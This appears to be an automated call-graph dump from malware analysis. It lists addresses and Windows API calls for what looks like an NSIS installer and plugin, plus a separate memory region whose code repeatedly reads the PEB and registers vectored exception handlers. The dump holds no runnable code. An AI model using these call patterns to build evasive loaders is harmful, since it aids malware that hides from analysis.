7421->7422 6639 73281774 6640 732817a3 6639->6640 6641 73281bff 22 API calls 6640->6641 6642 732817aa 6641->6642 6643 732817bd 6642->6643 6644 732817b1 6642->6644 6645 732817e4 6643->6645 6646 732817c7 6643->6646 6647 73281312 2 API calls 6644->6647 6649 732817ea 6645->6649 6650 7328180e 6645->6650 6648 732815dd 3 API calls 6646->6648 6651 732817bb 6647->6651 6653 732817cc 6648->6653 6654 73281654 3 API calls 6649->6654 6652 732815dd 3 API calls 6650->6652 6652->6651 6655 73281654 3 API calls 6653->6655 6656 732817ef 6654->6656 6657 732817d2 6655->6657 6658 73281312 2 API calls 6656->6658 6659 73281312 2 API calls 6657->6659 6660 732817f5 GlobalFree 6658->6660 6661 732817d8 GlobalFree 6659->6661 6660->6651 6662 73281809 GlobalFree 6660->6662 6661->6651 6662->6651 6663 40261c 6664 402da6 17 API calls 6663->6664 6665 402623 6664->6665 6668 40602d GetFileAttributesW CreateFileW 6665->6668 6667 40262f 6667->6667 6668->6667 6669 40202a 6670 402da6 17 API calls 6669->6670 6671 402031 6670->6671 6672 40690a 5 API calls 6671->6672 6673 402040 6672->6673 6674 40205c GlobalAlloc 6673->6674 6675 4020cc 6673->6675 6674->6675 6676 402070 6674->6676 6677 40690a 5 API calls 6676->6677 6678 402077 6677->6678 6679 40690a 5 API calls 6678->6679 6680 402081 6679->6680 6680->6675 6684 406484 wsprintfW 6680->6684 6682 4020ba 6685 406484 wsprintfW 6682->6685 6684->6682 6685->6675 7423 40252a 7424 402de6 17 API calls 7423->7424 7425 402534 7424->7425 7426 402da6 17 API calls 7425->7426 7427 40253d 7426->7427 7428 402548 RegQueryValueExW 7427->7428 7432 40292e 7427->7432 7429 40256e RegCloseKey 7428->7429 7430 402568 7428->7430 7429->7432 7430->7429 7434 406484 wsprintfW 7430->7434 7434->7429 6686 3795912 6687 37964d8 6686->6687 6696 379591c 6687->6696 6689 37964dd 6702 3795005 6689->6702 6691 37964f8 6705 3794f5d 6691->6705 6697 3795935 6696->6697 6698 3795694 2 API calls 6697->6698 6699 37950c1 6698->6699 6699->6689 6700 3796cd9 GetPEB 6699->6700 6701 3795952 6699->6701 6700->6701 6701->6689 6703 3795694 2 API calls 6702->6703 6704 3795026 6703->6704 6704->6691 6706 3795694 2 API calls 6705->6706 6707 3794f7c 6706->6707 6708 3795005 2 API calls 6707->6708 6709 37964f8 6708->6709 6710 3794f5d 2 API calls 6709->6710 6711 3796517 6710->6711 6714 3794fb6 6711->6714 6715 3795694 2 API calls 6714->6715 6716 3794fd5 6715->6716 6717 3795005 2 API calls 6716->6717 6718 37964f8 6717->6718 6719 3794f5d 2 API calls 6718->6719 6720 3796517 6719->6720 6721 3794fb6 2 API calls 6720->6721 6722 3796534 6721->6722 6723 73282d43 6724 73282d5b 6723->6724 6725 7328162f 2 API calls 6724->6725 6726 73282d76 6725->6726 5769 40352d SetErrorMode GetVersionExW 5770 4035b7 5769->5770 5771 40357f GetVersionExW 5769->5771 5772 403610 5770->5772 5773 40690a 5 API calls 5770->5773 5771->5770 5774 40689a 3 API calls 5772->5774 5773->5772 5775 403626 lstrlenA 5774->5775 5775->5772 5776 403636 5775->5776 5777 40690a 5 API calls 5776->5777 5778 40363d 5777->5778 5779 40690a 5 API calls 5778->5779 5780 403644 5779->5780 5781 40690a 5 API calls 5780->5781 5782 403650 #17 OleInitialize SHGetFileInfoW 5781->5782 5860 40653d lstrcpynW 5782->5860 5785 40369d GetCommandLineW 5861 40653d lstrcpynW 5785->5861 5787 4036af 5788 405e39 CharNextW 5787->5788 5789 4036d5 CharNextW 5788->5789 5797 4036e6 5789->5797 5790 4037e4 5791 4037f8 GetTempPathW 5790->5791 5862 4034fc 5791->5862 5793 403810 5794 403814 GetWindowsDirectoryW lstrcatW 5793->5794 5795 40386a DeleteFileW 5793->5795 5798 4034fc 12 API calls 5794->5798 5872 40307d GetTickCount GetModuleFileNameW 5795->5872 5796 405e39 CharNextW 5796->5797 5797->5790 5797->5796 5803 4037e6 5797->5803 5800 403830 5798->5800 5800->5795 5802 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 5800->5802 5801 40387d 5804 403941 5801->5804 5808 403932 5801->5808 5812 405e39 CharNextW 5801->5812 5807 4034fc 12 API calls 5802->5807 5956 40653d lstrcpynW 5803->5956 5964 403b12 5804->5964 5811 403862 5807->5811 5900 403bec 5808->5900 5811->5795 5811->5804 5824 40389f 5812->5824 5813 403a69 5971 405b9d 5813->5971 5814 403a7e 5816 403a86 GetCurrentProcess OpenProcessToken 5814->5816 5817 403afc ExitProcess 5814->5817 5822 403acc 5816->5822 5823 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 5816->5823 5819 403908 5826 405f14 18 API calls 5819->5826 5820 403949 5825 405b08 5 API calls 5820->5825 5827 40690a 5 API calls 5822->5827 5823->5822 5824->5819 5824->5820 5828 40394e lstrcatW 5825->5828 5829 403914 5826->5829 5830 403ad3 5827->5830 5831 40396a lstrcatW lstrcmpiW 5828->5831 5832 40395f lstrcatW 5828->5832 5829->5804 5957 40653d lstrcpynW 5829->5957 5833 403ae8 ExitWindowsEx 5830->5833 5834 403af5 5830->5834 5831->5804 5835 40398a 5831->5835 5832->5831 5833->5817 5833->5834 5975 40140b 5834->5975 5838 403996 5835->5838 5839 40398f 5835->5839 5842 405aeb 2 API calls 5838->5842 5841 405a6e 4 API calls 5839->5841 5840 403927 5958 40653d lstrcpynW 5840->5958 5844 403994 5841->5844 5845 40399b SetCurrentDirectoryW 5842->5845 5844->5845 5846 4039b8 5845->5846 5847 4039ad 5845->5847 5960 40653d lstrcpynW 5846->5960 5959 40653d lstrcpynW 5847->5959 5850 40657a 17 API calls 5851 4039fa DeleteFileW 5850->5851 5852 403a06 CopyFileW 5851->5852 5857 4039c5 5851->5857 5852->5857 5853 403a50 5854 4062fd 36 API calls 5853->5854 5854->5804 5855 4062fd 36 API calls 5855->5857 5856 40657a 17 API calls 5856->5857 5857->5850 5857->5853 5857->5855 5857->5856 5859 403a3a CloseHandle 5857->5859 5961 405b20 CreateProcessW 5857->5961 5859->5857 5860->5785 5861->5787 5863 4067c4 5 API calls 5862->5863 5865 403508 5863->5865 5864 403512 5864->5793 5865->5864 5866 405e0c 3 API calls 5865->5866 5867 40351a 5866->5867 5868 405aeb 2 API calls 5867->5868 5869 403520 5868->5869 5978 40605c 5869->5978 5982 40602d GetFileAttributesW CreateFileW 5872->5982 5874 4030bd 5892 4030cd 5874->5892 5983 40653d lstrcpynW 5874->5983 5876 4030e3 5877 405e58 2 API calls 5876->5877 5878 4030e9 5877->5878 5984 40653d lstrcpynW 5878->5984 5880 4030f4 GetFileSize 5881 4031ee 5880->5881 5899 40310b 5880->5899 5985 403019 5881->5985 5883 4031f7 5885 403227 GlobalAlloc 5883->5885 5883->5892 6020 4034e5 SetFilePointer 5883->6020 5996 4034e5 SetFilePointer 5885->5996 5887 40325a 5889 403019 6 API calls 5887->5889 5889->5892 5890 403210 5893 4034cf ReadFile 5890->5893 5891 403242 5997 4032b4 5891->5997 5892->5801 5895 40321b 5893->5895 5895->5885 5895->5892 5896 403019 6 API calls 5896->5899 5897 40324e 5897->5892 5897->5897 5898 40328b SetFilePointer 5897->5898 5898->5892 5899->5881 5899->5887 5899->5892 5899->5896 6017 4034cf 5899->6017 5901 40690a 5 API calls 5900->5901 5902 403c00 5901->5902 5903 403c06 5902->5903 5904 403c18 5902->5904 6041 406484 wsprintfW 5903->6041 5905 40640b 3 API calls 5904->5905 5906 403c48 5905->5906 5908 403c67 lstrcatW 5906->5908 5910 40640b 3 API calls 5906->5910 5909 403c16 5908->5909 6026 403ec2 5909->6026 5910->5908 5913 405f14 18 API calls 5914 403c99 5913->5914 5915 403d2d 5914->5915 5917 40640b 3 API calls 5914->5917 5916 405f14 18 API calls 5915->5916 5918 403d33 5916->5918 5919 403ccb 5917->5919 5920 403d43 LoadImageW 5918->5920 5921 40657a 17 API calls 5918->5921 5919->5915 5924 403cec lstrlenW 5919->5924 5928 405e39 CharNextW 5919->5928 5922 403de9 5920->5922 5923 403d6a RegisterClassW 5920->5923 5921->5920 5927 40140b 2 API calls 5922->5927 5925 403da0 SystemParametersInfoW CreateWindowExW 5923->5925 5926 403df3 5923->5926 5929 403d20 5924->5929 5930 403cfa lstrcmpiW 5924->5930 5925->5922 5926->5804 5931 403def 5927->5931 5933 403ce9 5928->5933 5932 405e0c 3 API calls 5929->5932 5930->5929 5934 403d0a GetFileAttributesW 5930->5934 5931->5926 5935 403ec2 18 API calls 5931->5935 5936 403d26 5932->5936 5933->5924 5937 403d16 5934->5937 5938 403e00 5935->5938 6042 40653d lstrcpynW 5936->6042 5937->5929 5940 405e58 2 API calls 5937->5940 5941 403e0c ShowWindow 5938->5941 5942 403e8f 5938->5942 5940->5929 5944 40689a 3 API calls 5941->5944 6034 405672 OleInitialize 5942->6034 5946 403e24 5944->5946 5945 403e95 5947 403eb1 5945->5947 5948 403e99 5945->5948 5949 403e32 GetClassInfoW 5946->5949 5951 40689a 3 API calls 5946->5951 5950 40140b 2 API calls 5947->5950 5948->5926 5954 40140b 2 API calls 5948->5954 5952 403e46 GetClassInfoW RegisterClassW 5949->5952 5953 403e5c DialogBoxParamW 5949->5953 5950->5926 5951->5949 5952->5953 5955 40140b 2 API calls 5953->5955 5954->5926 5955->5926 5956->5791 5957->5840 5958->5808 5959->5846 5960->5857 5962 405b53 CloseHandle 5961->5962 5963 405b5f 5961->5963 5962->5963 5963->5857 5965 403b2a 5964->5965 5966 403b1c CloseHandle 5964->5966 6054 403b57 5965->6054 5966->5965 5969 405c49 67 API calls 5970 403a5e OleUninitialize 5969->5970 5970->5813 5970->5814 5972 405bb2 5971->5972 5973 403a76 ExitProcess 5972->5973 5974 405bc6 MessageBoxIndirectW 5972->5974 5974->5973 5976 401389 2 API calls 5975->5976 5977 401420 5976->5977 5977->5817 5979 406069 GetTickCount GetTempFileNameW 5978->5979 5980 40609f 5979->5980 5981 40352b 5979->5981 5980->5979 5980->5981 5981->5793 5982->5874 5983->5876 5984->5880 5986 403022 5985->5986 5987 40303a 5985->5987 5990 403032 5986->5990 5991 40302b DestroyWindow 5986->5991 5988 403042 5987->5988 5989 40304a GetTickCount 5987->5989 6021 406946 5988->6021 5993 403058 CreateDialogParamW ShowWindow 5989->5993 5994 40307b 5989->5994 5990->5883 5991->5990 5993->5994 5994->5883 5996->5891 5998 4032cd 5997->5998 5999 4032fb 5998->5999 6025 4034e5 SetFilePointer 5998->6025 6001 4034cf ReadFile 5999->6001 6002 403306 6001->6002 6003 403468 6002->6003 6004 403318 GetTickCount 6002->6004 6008 403452 6002->6008 6005 4034aa 6003->6005 6010 40346c 6003->6010 6004->6008 6013 403367 6004->6013 6006 4034cf ReadFile 6005->6006 6006->6008 6007 4034cf ReadFile 6007->6013 6008->5897 6009 4034cf ReadFile 6009->6010 6010->6008 6010->6009 6011 4060df WriteFile 6010->6011 6011->6010 6012 4033bd GetTickCount 6012->6013 6013->6007 6013->6008 6013->6012 6014 4033e2 MulDiv wsprintfW 6013->6014 6016 4060df WriteFile 6013->6016 6015 40559f 24 API calls 6014->6015 6015->6013 6016->6013 6018 4060b0 ReadFile 6017->6018 6019 4034e2 6018->6019 6019->5899 6020->5890 6022 406963 PeekMessageW 6021->6022 6023 403048 6022->6023 6024 406959 DispatchMessageW 6022->6024 6023->5883 6024->6022 6025->5999 6027 403ed6 6026->6027 6043 406484 wsprintfW 6027->6043 6029 403f47 6044 403f7b 6029->6044 6031 403c77 6031->5913 6032 403f4c 6032->6031 6033 40657a 17 API calls 6032->6033 6033->6032 6047 4044e5 6034->6047 6036 4044e5 SendMessageW 6037 4056ce OleUninitialize 6036->6037 6037->5945 6039 4056bc 6039->6036 6040 405695 6040->6039 6050 401389 6040->6050 6041->5909 6042->5915 6043->6029 6045 40657a 17 API calls 6044->6045 6046 403f89 SetWindowTextW 6045->6046 6046->6032 6048 4044fd 6047->6048 6049 4044ee SendMessageW 6047->6049 6048->6040 6049->6048 6052 401390 6050->6052 6051 4013fe 6051->6040 6052->6051 6053 4013cb MulDiv SendMessageW 6052->6053 6053->6052 6055 403b65 6054->6055 6056 403b2f 6055->6056 6057 403b6a FreeLibrary GlobalFree 6055->6057 6056->5969 6057->6056 6057->6057 6727 401a30 6728 402da6 17 API calls 6727->6728 6729 401a39 ExpandEnvironmentStringsW 6728->6729 6730 401a4d 6729->6730 6732 401a60 6729->6732 6731 401a52 lstrcmpW 6730->6731 6730->6732 6731->6732 7435 73281058 7437 73281074 7435->7437 7436 732810dd 7437->7436 7438 732815b6 GlobalFree 7437->7438 7439 73281092 7437->7439 7438->7439 7440 732815b6 GlobalFree 7439->7440 7441 732810a2 7440->7441 7442 732810a9 GlobalSize 7441->7442 7443 732810b2 7441->7443 7442->7443 7444 732810c7 7443->7444 7445 732810b6 GlobalAlloc 7443->7445 7447 732810d2 GlobalFree 7444->7447 7446 732815dd 3 API calls 7445->7446 7446->7444 7447->7436 6733 402434 6734 402467 6733->6734 6735 40243c 6733->6735 6736 402da6 17 API calls 6734->6736 6744 402de6 6735->6744 6738 40246e 6736->6738 6749 402e64 6738->6749 6741 402da6 17 API calls 6742 402454 RegDeleteValueW RegCloseKey 6741->6742 6743 40247b 6742->6743 6745 402da6 17 API calls 6744->6745 6746 402dfd 6745->6746 6747 4063aa RegOpenKeyExW 6746->6747 6748 402443 6747->6748 6748->6741 6748->6743 6750 402e71 6749->6750 6751 402e78 6749->6751 6750->6743 6751->6750 6753 402ea9 6751->6753 6754 4063aa RegOpenKeyExW 6753->6754 6755 402ed7 6754->6755 6756 402ee7 RegEnumValueW 6755->6756 6763 402f81 6755->6763 6765 402f0a 6755->6765 6757 402f71 RegCloseKey 6756->6757 6756->6765 6757->6763 6758 402f46 RegEnumKeyW 6759 402f4f RegCloseKey 6758->6759 6758->6765 6760 40690a 5 API calls 6759->6760 6761 402f5f 6760->6761 6761->6763 6764 402f63 RegDeleteKeyW 6761->6764 6762 402ea9 6 API calls 6762->6765 6763->6750 6764->6763 6765->6757 6765->6758 6765->6759 6765->6762 7448 401735 7449 402da6 17 API calls 7448->7449 7450 40173c SearchPathW 7449->7450 7451 401757 7450->7451 6766 379590e 6767 37964d8 6766->6767 6768 379591c 2 API calls 6767->6768 6769 37964dd 6768->6769 6770 3795005 2 API calls 6769->6770 6771 37964f8 6770->6771 6772 3794f5d 2 API calls 6771->6772 6773 3796517 6772->6773 6774 3794fb6 2 API calls 6773->6774 6775 3796534 6774->6775 7452 3792601 7453 3795694 2 API calls 7452->7453 7454 3792628 7453->7454 7455 401d38 7456 402d84 17 API calls 7455->7456 7457 401d3f 7456->7457 7458 402d84 17 API calls 7457->7458 7459 401d4b GetDlgItem 7458->7459 7460 402638 7459->7460 6313 3790000 6314 3790061 6313->6314 6319 3790002 6314->6319 6316 3790066 6317 3796cd9 GetPEB 6316->6317 6318 379018f 6316->6318 6317->6318 6320 3790008 6319->6320 6321 3790002 GetPEB 6320->6321 6322 3790066 6321->6322 6323 3796cd9 GetPEB 6322->6323 6324 379018f 6322->6324 6323->6324 6324->6316 6776 40263e 6777 402652 6776->6777 6778 40266d 6776->6778 6779 402d84 17 API calls 6777->6779 6780 402672 6778->6780 6781 40269d 6778->6781 6789 402659 6779->6789 6782 402da6 17 API calls 6780->6782 6783 402da6 17 API calls 6781->6783 6784 402679 6782->6784 6785 4026a4 lstrlenW 6783->6785 6793 40655f WideCharToMultiByte 6784->6793 6785->6789 6787 40268d lstrlenA 6787->6789 6788 4026e7 6789->6788 6790 4026d1 6789->6790 6794 40610e SetFilePointer 6789->6794 6790->6788 6791 4060df WriteFile 6790->6791 6791->6788 6793->6787 6795 40612a 6794->6795 6802 406142 6794->6802 6796 4060b0 ReadFile 6795->6796 6797 406136 6796->6797 6798 406173 SetFilePointer 6797->6798 6799 40614b SetFilePointer 6797->6799 6797->6802 6798->6802 6799->6798 6800 406156 6799->6800 6801 4060df WriteFile 6800->6801 6801->6802 6802->6790 7462 3796006 7463 3796034 7462->7463 7464 3795694 2 API calls 7462->7464 7465 3796a18 GetPEB 7463->7465 7464->7463 7466 3796042 7465->7466 7467 3796a18 GetPEB 7466->7467 7468 3796055 7467->7468 5726 4015c1 5727 402da6 17 API calls 5726->5727 5728 4015c8 5727->5728 5729 405eb7 4 API calls 5728->5729 5741 4015d1 5729->5741 5730 401631 5732 401663 5730->5732 5733 401636 5730->5733 5731 405e39 CharNextW 5731->5741 5735 401423 24 API calls 5732->5735 5753 401423 5733->5753 5743 40165b 5735->5743 5740 40164a SetCurrentDirectoryW 5740->5743 5741->5730 5741->5731 5742 401617 GetFileAttributesW 5741->5742 5745 405b08 5741->5745 5748 405a6e CreateDirectoryW 5741->5748 5757 405aeb CreateDirectoryW 5741->5757 5742->5741 5760 40690a GetModuleHandleA 5745->5760 5749 405abb 5748->5749 5750 405abf GetLastError 5748->5750 5749->5741 5750->5749 5751 405ace SetFileSecurityW 5750->5751 5751->5749 5752 405ae4 GetLastError 5751->5752 5752->5749 5754 40559f 24 API calls 5753->5754 5755 401431 5754->5755 5756 40653d lstrcpynW 5755->5756 5756->5740 5758 405afb 5757->5758 5759 405aff GetLastError 5757->5759 5758->5741 5759->5758 5761 406930 GetProcAddress 5760->5761 5762 406926 5760->5762 5764 405b0f 5761->5764 5766 40689a GetSystemDirectoryW 5762->5766 5764->5741 5765 40692c 5765->5761 5765->5764 5767 4068bc wsprintfW LoadLibraryExW 5766->5767 5767->5765 6803 4028c4 6804 4028ca 6803->6804 6805 4028d2 FindClose 6804->6805 6806 402c2a 6804->6806 6805->6806 6810 3795ff5 6811 3795694 2 API calls 6810->6811 6812 3796034 6811->6812 6813 3796a18 GetPEB 6812->6813 6814 3796042 6813->6814 6815 3796a18 GetPEB 6814->6815 6816 3796055 6815->6816 6817 4016cc 6818 402da6 17 API calls 6817->6818 6819 4016d2 GetFullPathNameW 6818->6819 6820 4016ec 6819->6820 6826 40170e 6819->6826 6822 406873 2 API calls 6820->6822 6820->6826 6821 401723 GetShortPathNameW 6823 402c2a 6821->6823 6824 4016fe 6822->6824 6824->6826 6827 40653d lstrcpynW 6824->6827 6826->6821 6826->6823 6827->6826 6828 3790df7 6829 379812b RtlAddVectoredExceptionHandler 6828->6829 6830 3790e27 6829->6830 7469 4045cf lstrcpynW lstrlenW 6831 37937ec GetPEB 6832 3793789 6831->6832 6833 4014d7 6834 402d84 17 API calls 6833->6834 6835 4014dd Sleep 6834->6835 6837 402c2a 6835->6837 6119 4020d8 6120 40219c 6119->6120 6121 4020ea 6119->6121 6124 401423 24 API calls 6120->6124 6122 402da6 17 API calls 6121->6122 6123 4020f1 6122->6123 6125 402da6 17 API calls 6123->6125 6130 4022f6 6124->6130 6126 4020fa 6125->6126 6127 402110 LoadLibraryExW 6126->6127 6128 402102 GetModuleHandleW 6126->6128 6127->6120 6129 402121 6127->6129 6128->6127 6128->6129 6142 406979 6129->6142 6133 402132 6136 402151 6133->6136 6137 40213a 6133->6137 6134 40216b 6135 40559f 24 API calls 6134->6135 6139 402142 6135->6139 6147 73281817 6136->6147 6138 401423 24 API calls 6137->6138 6138->6139 6139->6130 6140 40218e FreeLibrary 6139->6140 6140->6130 6189 40655f WideCharToMultiByte 6142->6189 6144 406996 6145 40699d GetProcAddress 6144->6145 6146 40212c 6144->6146 6145->6146 6146->6133 6146->6134 6148 7328184a 6147->6148 6190 73281bff 6148->6190 6150 73281851 6151 73281976 6150->6151 6152 73281869 6150->6152 6153 73281862 6150->6153 6151->6139 6224 73282480 6152->6224 6240 7328243e 6153->6240 6158 732818cd 6164 7328191e 6158->6164 6165 732818d3 6158->6165 6159 732818af 6253 73282655 6159->6253 6160 73281898 6174 7328188e 6160->6174 6250 73282e23 6160->6250 6161 7328187f 6163 73281885 6161->6163 6167 73281890 6161->6167 6163->6174 6234 73282b98 6163->6234 6171 73282655 10 API calls 6164->6171 6272 73281666 6165->6272 6166 732818b5 6264 73281654 6166->6264 6244 73282810 6167->6244 6172 7328190f 6171->6172 6180 73281965 6172->6180 6278 73282618 6172->6278 6174->6158 6174->6159 6178 73281896 6178->6174 6179 73282655 10 API calls 6179->6172 6180->6151 6184 7328196f GlobalFree 6180->6184 6184->6151 6186 73281951 6186->6180 6282 732815dd wsprintfW 6186->6282 6187 7328194a FreeLibrary 6187->6186 6189->6144 6285 732812bb GlobalAlloc 6190->6285 6192 73281c26 6286 732812bb GlobalAlloc 6192->6286 6194 73281e6b GlobalFree GlobalFree GlobalFree 6195 73281e88 6194->6195 6213 73281ed2 6194->6213 6196 7328227e 6195->6196 6204 73281e9d 6195->6204 6195->6213 6198 732822a0 GetModuleHandleW 6196->6198 6196->6213 6197 73281d26 GlobalAlloc 6217 73281c31 6197->6217 6201 732822b1 LoadLibraryW 6198->6201 6202 732822c6 6198->6202 6199 73281d71 lstrcpyW 6203 73281d7b lstrcpyW 6199->6203 6200 73281d8f GlobalFree 6200->6217 6201->6202 6201->6213 6293 732816bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 6202->6293 6203->6217 6204->6213 6289 732812cc 6204->6289 6206 73282318 6209 73282325 lstrlenW 6206->6209 6206->6213 6207 73282126 6292 732812bb GlobalAlloc 6207->6292 6294 732816bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 6209->6294 6211 73282067 GlobalFree 6211->6217 6212 732821ae 6212->6213 6220 73282216 lstrcpyW 6212->6220 6213->6150 6214 732822d8 6214->6206 6222 73282302 GetProcAddress 6214->6222 6216 7328233f 6216->6213 6217->6194 6217->6197 6217->6199 6217->6200 6217->6203 6217->6207 6217->6211 6217->6212 6217->6213 6218 732812cc 2 API calls 6217->6218 6219 73281dcd 6217->6219 6218->6217 6219->6217 6287 7328162f GlobalSize GlobalAlloc 6219->6287 6220->6213 6222->6206 6223 7328212f 6223->6150 6226 73282498 6224->6226 6225 732812cc GlobalAlloc lstrcpynW 6225->6226 6226->6225 6228 732825c1 GlobalFree 6226->6228 6229 7328256b GlobalAlloc CLSIDFromString 6226->6229 6230 73282540 GlobalAlloc WideCharToMultiByte 6226->6230 6233 7328258a 6226->6233 6296 7328135a 6226->6296 6228->6226 6231 7328186f 6228->6231 6229->6228 6230->6228 6231->6160 6231->6161 6231->6174 6233->6228 6300 732827a4 6233->6300 6237 73282baa 6234->6237 6235 73282c4f CloseHandle 6236 73282c6d 6235->6236 6303 73282b42 6236->6303 6237->6235 6239 73282d39 6239->6174 6241 73282453 6240->6241 6242 7328245e GlobalAlloc 6241->6242 6243 73281868 6241->6243 6242->6241 6243->6152 6248 73282840 6244->6248 6245 732828db GlobalAlloc 6249 732828fe 6245->6249 6246 732828ee 6247 732828f4 GlobalSize 6246->6247 6246->6249 6247->6249 6248->6245 6248->6246 6249->6178 6251 73282e2e 6250->6251 6252 73282e6e GlobalFree 6251->6252 6307 732812bb GlobalAlloc 6253->6307 6255 732826d8 MultiByteToWideChar 6260 7328265f 6255->6260 6256 732826fa StringFromGUID2 6256->6260 6257 7328270b lstrcpynW 6257->6260 6258 7328271e wsprintfW 6258->6260 6259 73282742 GlobalFree 6259->6260 6260->6255 6260->6256 6260->6257 6260->6258 6260->6259 6261 73282777 GlobalFree 6260->6261 6262 73281312 2 API calls 6260->6262 6308 73281381 6260->6308 6261->6166 6262->6260 6312 732812bb GlobalAlloc 6264->6312 6266 73281659 6267 73281666 2 API calls 6266->6267 6268 73281663 6267->6268 6269 73281312 6268->6269 6270 7328131b GlobalAlloc lstrcpynW 6269->6270 6271 73281355 GlobalFree 6269->6271 6270->6271 6271->6172 6273 7328169f lstrcpyW 6272->6273 6276 73281672 wsprintfW 6272->6276 6277 732816b8 6273->6277 6276->6277 6277->6179 6279 73281931 6278->6279 6280 73282626 6278->6280 6279->6186 6279->6187 6280->6279 6281 73282642 GlobalFree 6280->6281 6281->6280 6283 73281312 2 API calls 6282->6283 6284 732815fe 6283->6284 6284->6180 6285->6192 6286->6217 6288 7328164d 6287->6288 6288->6219 6295 732812bb GlobalAlloc 6289->6295 6291 732812db lstrcpynW 6291->6213 6292->6223 6293->6214 6294->6216 6295->6291 6297 73281361 6296->6297 6298 732812cc 2 API calls 6297->6298 6299 7328137f 6298->6299 6299->6226 6301 73282808 6300->6301 6302 732827b2 VirtualAlloc 6300->6302 6301->6233 6302->6301 6304 73282b4d 6303->6304 6305 73282b5d 6304->6305 6306 73282b52 GetLastError 6304->6306 6305->6239 6306->6305 6307->6260 6309 7328138a 6308->6309 6310 732813ac 6308->6310 6309->6310 6311 73281390 lstrcpyW 6309->6311 6310->6260 6311->6310 6312->6266 6838 3793fe2 6843 3793ee9 6838->6843 6840 3790903 6842 379812b RtlAddVectoredExceptionHandler 6842->6843 6843->6840 6843->6842 6844 37950c1 6843->6844 6845 3794b2b 6843->6845 6847 379425b 6843->6847 6878 3797564 6843->6878 6921 3794bd0 6843->6921 6848 3796cd9 GetPEB 6844->6848 6851 3796a96 6844->6851 6846 379812b RtlAddVectoredExceptionHandler 6845->6846 6849 3794b3c 6846->6849 6931 3794f3f 6847->6931 6848->6851 6852 379812b RtlAddVectoredExceptionHandler 6849->6852 6853 3794b4a 6852->6853 6854 379812b RtlAddVectoredExceptionHandler 6853->6854 6855 3794b80 6854->6855 6857 379812b RtlAddVectoredExceptionHandler 6855->6857 6859 3794bb8 6857->6859 6879 3796a18 GetPEB 6878->6879 6880 379757a 6879->6880 6881 3796a18 GetPEB 6880->6881 6882 379758d GetPEB 6881->6882 6889 3793ee9 6882->6889 6883 3796cd9 GetPEB 6886 3796a96 6883->6886 6884 3797564 3 API calls 6884->6889 6885 37950c1 6885->6843 6885->6883 6885->6886 6886->6843 6887 3794bd0 2 API calls 6887->6889 6888 3790903 6888->6843 6889->6884 6889->6885 6889->6887 6889->6888 6890 379812b RtlAddVectoredExceptionHandler 6889->6890 6891 3794b2b 6889->6891 6893 379425b 6889->6893 6890->6889 6892 379812b RtlAddVectoredExceptionHandler 6891->6892 6894 3794b3c 6892->6894 6895 3794f3f 2 API calls 6893->6895 6896 379812b RtlAddVectoredExceptionHandler 6894->6896 6900 379427a 6895->6900 6897 3794b4a 6896->6897 6898 379812b RtlAddVectoredExceptionHandler 6897->6898 6899 3794b80 6898->6899 6901 379812b RtlAddVectoredExceptionHandler 6899->6901 6900->6885 6902 379812b RtlAddVectoredExceptionHandler 6900->6902 6903 3794bb8 6901->6903 6904 3794497 6902->6904 6903->6843 6904->6888 6904->6891 6905 379812b RtlAddVectoredExceptionHandler 6904->6905 6906 37945b5 6905->6906 6906->6891 6907 379812b RtlAddVectoredExceptionHandler 6906->6907 6908 3794749 6907->6908 6908->6891 6938 37950c1 6908->6938 6910 3794992 6910->6885 6910->6891 6911 37949eb 6910->6911 6912 379812b RtlAddVectoredExceptionHandler 6911->6912 6913 3794a2b 6912->6913 6913->6891 6914 379812b RtlAddVectoredExceptionHandler 6913->6914 6915 3794a96 6914->6915 6915->6891 6916 3794ac6 6915->6916 6917 379812b RtlAddVectoredExceptionHandler 6916->6917 6918 3794afc 6917->6918 6919 379812b RtlAddVectoredExceptionHandler 6918->6919 6920 3794b2a 6919->6920 6920->6843 6922 37964be 6921->6922 6923 379591c 2 API calls 6922->6923 6924 37964dd 6923->6924 6925 3795005 2 API calls 6924->6925 6926 37964f8 6925->6926 6927 3794f5d 2 API calls 6926->6927 6928 3796517 6927->6928 6929 3794fb6 2 API calls 6928->6929 6930 3796534 6929->6930 6942 37967a6 6931->6942 6933 3794f52 6934 3796517 6933->6934 6935 3794f5d 2 API calls 6933->6935 6936 3794fb6 2 API calls 6934->6936 6935->6934 6937 3796534 6936->6937 6939 37950c6 6938->6939 6939->6910 6940 3796cd9 GetPEB 6939->6940 6941 3796a96 6939->6941 6940->6941 6941->6910 6943 3796a18 6942->6943 6946 37967ce 6942->6946 6944 3796cd9 GetPEB 6943->6944 6945 3796a96 6943->6945 6944->6945 6945->6933 6946->6933 6427 401ede 6435 402d84 6427->6435 6429 401ee4 6430 402d84 17 API calls 6429->6430 6431 401ef0 6430->6431 6432 401f07 EnableWindow 6431->6432 6433 401efc ShowWindow 6431->6433 6434 402c2a 6432->6434 6433->6434 6436 40657a 17 API calls 6435->6436 6437 402d99 6436->6437 6437->6429 6438 4056de 6439 405888 6438->6439 6440 4056ff GetDlgItem GetDlgItem GetDlgItem 6438->6440 6442 405891 GetDlgItem CreateThread CloseHandle 6439->6442 6443 4058b9 6439->6443 6484 4044ce SendMessageW 6440->6484 6442->6443 6487 405672 5 API calls 6442->6487 6444 4058e4 6443->6444 6445 4058d0 ShowWindow ShowWindow 6443->6445 6446 405909 6443->6446 6447 4058f0 6444->6447 6448 405944 6444->6448 6486 4044ce SendMessageW 6445->6486 6453 404500 8 API calls 6446->6453 6451 4058f8 6447->6451 6452 40591e ShowWindow 6447->6452 6448->6446 6455 405952 SendMessageW 6448->6455 6449 40576f 6454 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 6449->6454 6456 404472 SendMessageW 6451->6456 6458 405930 6452->6458 6459 40593e 6452->6459 6457 405917 6453->6457 6460 4057e4 6454->6460 6461 4057c8 SendMessageW SendMessageW 6454->6461 6455->6457 6462 40596b CreatePopupMenu 6455->6462 6456->6446 6465 40559f 24 API calls 6458->6465 6466 404472 SendMessageW 6459->6466 6463 4057f7 6460->6463 6464 4057e9 SendMessageW 6460->6464 6461->6460 6467 40657a 17 API calls 6462->6467 6468 404499 18 API calls 6463->6468 6464->6463 6465->6459 6466->6448 6469 40597b AppendMenuW 6467->6469 6470 405807 6468->6470 6471 405998 GetWindowRect 6469->6471 6472 4059ab TrackPopupMenu 6469->6472 6473 405810 ShowWindow 